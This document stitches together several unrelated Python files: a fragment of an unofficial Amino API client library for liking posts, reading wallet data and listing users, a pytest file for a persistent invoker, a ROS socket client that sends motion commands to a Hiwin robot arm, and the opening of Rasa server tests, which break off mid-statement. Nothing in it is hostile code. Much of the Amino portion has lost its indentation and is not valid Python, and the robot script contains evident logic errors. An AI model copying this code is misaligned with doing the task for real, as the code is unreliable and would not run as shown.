- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/feed/g-vote", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
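    # Usage sketch with placeholder IDs; passing a list likes several blogs in
    # a single request:
    #
    #   client.like_blog(blogId="blog-id")
    #   client.like_blog(blogId=["blog-id-1", "blog-id-2"])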
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/membership?force=true", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage
response = requests.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/wallet", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
        Get the User ID from a Device ID.
        **Parameters**
        - **deviceId** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- ``http://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/link-resolution?q={code}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
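    # A minimal usage sketch (hypothetical `client` instance; for the link
    # http://aminoapps.com/p/EXAMPLE the code is "EXAMPLE", and FromCode is
    # assumed here to expose `objectId` and `objectType`):
    #
    #   info = client.get_from_code("EXAMPLE")
    #   print(info.objectId, info.objectType)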
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
        - **objectId** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = requests.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/link-resolution", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
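    # A minimal usage sketch (hypothetical IDs; the objectType value 0 is assumed
    # here to denote a user - check the API's object-type table before relying on it):
    #
    #   info = client.get_from_id("someUserId", objectType=0)
    #   print(info.objectId)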
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
        Get the list of Amino users.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
    def accept_organizer(self, chatId: str, requestId: str):
        return self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = requests.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
        Invite a User to a Voice Chat.
        **Parameters**
        - **chatId** : ID of the Chat.
        - **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite/", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
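    # A minimal usage sketch (hypothetical IDs; assumes the chat has an active
    # voice chat and `client` is authenticated; 200 is the documented success value):
    #
    #   status = client.invite_to_vc(chatId="someChatId", userId="someUserId")
    #   assert status == 200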
|
test_persistent_invoker.py
|
import datetime
import threading
import time
import pytest
from edera import routine
from edera.exceptions import ExcusableError
from edera.invokers import PersistentInvoker
def test_invoker_runs_action_with_given_delay():
@routine
def append_current_timestamp():
counter[0] += 1
yield
timestamps.append(datetime.datetime.utcnow())
def audit():
if counter[0] > limit:
raise RuntimeError
timestamps = []
counter = [0]
limit = 3
delay = datetime.timedelta(seconds=1.0)
with pytest.raises(RuntimeError):
PersistentInvoker(append_current_timestamp, delay=delay).invoke[audit]()
assert len(timestamps) == limit
assert abs((timestamps[2] - timestamps[0]) - (limit - 1) * delay) < delay
def test_invoker_runs_action_forever():
def append_current_timestamp():
counter[0] += 1
raise ExcusableError("to be swallowed")
def audit():
if interrupted:
raise RuntimeError
counter = [0]
interrupted = False
delay = datetime.timedelta(seconds=0.1)
invoker = PersistentInvoker(append_current_timestamp, delay=delay)
invoker_thread = threading.Thread(target=invoker.invoke[audit])
invoker_thread.daemon = True
invoker_thread.start()
time.sleep(0.3)
assert invoker_thread.is_alive()
assert counter[0] >= 1
time.sleep(0.3)
assert invoker_thread.is_alive()
assert counter[0] >= 3
interrupted = True
time.sleep(0.3)
assert not invoker_thread.is_alive()
invoker_thread.join()
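# A minimal usage sketch distilled from the tests above (it assumes only the API
# exercised here: a `delay` keyword and the `invoke[audit]` form, whose audit
# callback stops the loop by raising):
#
#   import datetime
#   from edera.invokers import PersistentInvoker
#
#   def tick():
#       print("tick")
#
#   def audit():
#       if should_stop():  # hypothetical stop predicate
#           raise RuntimeError
#
#   PersistentInvoker(tick, delay=datetime.timedelta(seconds=1)).invoke[audit]()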
|
Hiwin_RT605_ArmCommand_Socket_20190627164039.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32, Int32MultiArray  # Int32 is used by socket_talker below
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and forward them over a socket to the control PC
import socket
## Multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # a bare return ends the generator; raising StopIteration here is a RuntimeError under PEP 479 (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
        elif self.value in args:  # exact match: enter this case and allow fall-through
self.fall = True
return True
else:
return False
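# A minimal usage sketch of the switch emulation above (hypothetical command
# value and handler; calling case() with no argument acts as the default branch):
#
#   for case in switch(command):
#       if case('start'):
#           start_arm()  # hypothetical handler
#           break
#       if case():  # default
#           print('unknown command:', command)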
##-----------client feedback arm state----------
class StateFeedback():
    def __init__(self, ArmState, SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(False,False)
def point_data(x,y,z,pitch,roll,yaw): ## Receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## Receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## Receive speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ## Receive gripper-action data sent from the strategy side
#     socket_cmd.grip = int('%s'%req.grip)
#     return(1)
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32()
state.data = 1
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
    #rospy.spin() ## spin once
##------------server side end-------
##----------socket packet transmission--------------##
##---------------send arm commands over the socket-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set the arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set the arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set the arm rapid & safe mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5 ## reset to the initial mode state
        Socket.send(data.encode('utf-8')) # send the command string over the socket as UTF-8 bytes
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
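# A minimal sketch of driving Socket_command above (hypothetical values; it
# mirrors how the strategy side first stores a pose via point_data() and then
# dispatches a move through Arm_Mode()):
#
#   point_data(0, 36.8, 11.35, -90, 0, 0)      # target pose
#   Arm_Mode(action=Taskcmd.Action_Type.PtoP,  # point-to-point move
#            grip=0, ra=Taskcmd.RA.ABS,
#            setvel=20, setboth=Taskcmd.Ctrl_Mode.CTRL_POS)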
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports its state
        if str(feedback_str[2]) == '48': # '0' (False): the arm is Ready to accept the next motion command
state_feedback.ArmState = False
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
        if str(feedback_str[2]) == '49': # '1' (True): the arm is busy and cannot execute the next motion command
state_feedback.ArmState = True
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
        if str(feedback_str[2]) == '54': # '6': the strategy has finished
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48': # returned '0': False
state_feedback.SentFlag = False
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
        if str(feedback_str[4]) == '49': # returned '1': True
state_feedback.SentFlag = True
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
        ##---------------send arm commands over the socket: end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## Multithreading
def thread_test():
socket_client()
## Multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## reset to the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
test_server.py
|
import asyncio
import json
import os
import time
import urllib.parse
import uuid
import sys
from http import HTTPStatus
from multiprocessing import Process, Manager
from multiprocessing.managers import DictProxy
from pathlib import Path
from typing import List, Text, Type, Generator, NoReturn, Dict, Optional
from unittest.mock import Mock, ANY
from _pytest.tmpdir import TempPathFactory
import pytest
import requests
from _pytest import pathlib
from _pytest.monkeypatch import MonkeyPatch
from aioresponses import aioresponses
from freezegun import freeze_time
from unittest.mock import MagicMock
from ruamel.yaml import StringIO
from sanic import Sanic
from sanic_testing.testing import SanicASGITestClient
import rasa
import rasa.constants
import rasa.core.jobs
from rasa.engine.storage.local_model_storage import LocalModelStorage
import rasa.nlu
import rasa.server
import rasa.shared.constants
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core import utils
from rasa.core.agent import Agent, load_agent
from rasa.core.channels import (
channel,
CollectingOutputChannel,
RestInput,
SlackInput,
CallbackInput,
)
from rasa.core.channels.slack import SlackBot
from rasa.core.tracker_store import InMemoryTrackerStore
import rasa.nlu.test
from rasa.nlu.test import CVEvaluationResult
from rasa.shared.core import events
from rasa.shared.core.constants import (
ACTION_SESSION_START_NAME,
ACTION_LISTEN_NAME,
REQUESTED_SLOT,
SESSION_START_METADATA_SLOT,
)
from rasa.shared.core.domain import Domain, SessionConfig
from rasa.shared.core.events import (
Event,
UserUttered,
SlotSet,
BotUttered,
ActionExecuted,
SessionStarted,
)
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.model_training import TrainingResult
from rasa.utils.endpoints import EndpointConfig
from tests.conftest import AsyncMock, with_model_id, with_model_ids
from tests.nlu.utilities import ResponseTest
from tests.utilities import json_of_latest_request, latest_request
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
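# Round-trip sketch (assumption: Event.from_parameters inverts Event.as_dict,
# which the push/replace-event tests below rely on):
#
#   serialized = test_events[1].as_dict()
#   assert Event.from_parameters(serialized) == test_events[1]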
# sequence of events expected at the beginning of trackers
session_start_sequence: List[Event] = [
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicASGITestClient:
return rasa_server_without_api.asgi_client
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicASGITestClient:
return rasa_server.asgi_client
@pytest.fixture
def rasa_non_trained_app(rasa_non_trained_server: Sanic) -> SanicASGITestClient:
return rasa_non_trained_server.asgi_client
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicASGITestClient:
return rasa_nlu_server.asgi_client
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicASGITestClient:
return rasa_core_server.asgi_client
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicASGITestClient:
return rasa_server_secured.asgi_client
@pytest.fixture
def rasa_non_trained_secured_app(
rasa_non_trained_server_secured: Sanic,
) -> SanicASGITestClient:
return rasa_non_trained_server_secured.asgi_client
@pytest.fixture()
async def tear_down_scheduler() -> Generator[None, None, None]:
yield None
rasa.core.jobs.__scheduler = None
async def test_root(rasa_non_trained_app: SanicASGITestClient):
_, response = await rasa_non_trained_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_without_enable_api(rasa_app_without_api: SanicASGITestClient):
_, response = await rasa_app_without_api.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_secured(rasa_non_trained_secured_app: SanicASGITestClient):
_, response = await rasa_non_trained_secured_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_version(rasa_non_trained_app: SanicASGITestClient):
_, response = await rasa_non_trained_app.get("/version")
content = response.json
assert response.status == HTTPStatus.OK
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
async def test_status(rasa_app: SanicASGITestClient, trained_rasa_model: Text):
_, response = await rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert model_file == Path(trained_rasa_model).name
async def test_status_nlu_only(
rasa_app_nlu: SanicASGITestClient, trained_nlu_model: Text
):
_, response = await rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == Path(trained_nlu_model).name
async def test_status_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/status")
assert response.status == HTTPStatus.UNAUTHORIZED
async def test_status_not_ready_agent(rasa_app: SanicASGITestClient):
rasa_app.sanic_app.agent = None
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.CONFLICT
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path, monkeypatch: MonkeyPatch
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> TrainingResult:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return TrainingResult(model=fake_model_path)
def run_server(monkeypatch: MonkeyPatch) -> NoReturn:
import sys
monkeypatch.setattr(
sys.modules["rasa.model_training"], "train", mocked_training_function,
)
from rasa import __main__
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server, args=(monkeypatch,))
yield server
server.terminate()
@pytest.fixture()
def training_request(
shared_statuses: DictProxy, tmp_path: Path
) -> Generator[Process, None, None]:
def send_request() -> None:
payload = {}
project_path = Path("examples") / "formbot"
for file in [
"domain.yml",
"config.yml",
Path("data") / "rules.yml",
Path("data") / "stories.yml",
Path("data") / "nlu.yml",
]:
full_path = project_path / file
# Read in as dictionaries to avoid that keys, which are specified in
# multiple files (such as 'version'), clash.
content = rasa.shared.utils.io.read_yaml_file(full_path)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
response = requests.post(
"http://localhost:5005/model/train",
data=payload_as_yaml,
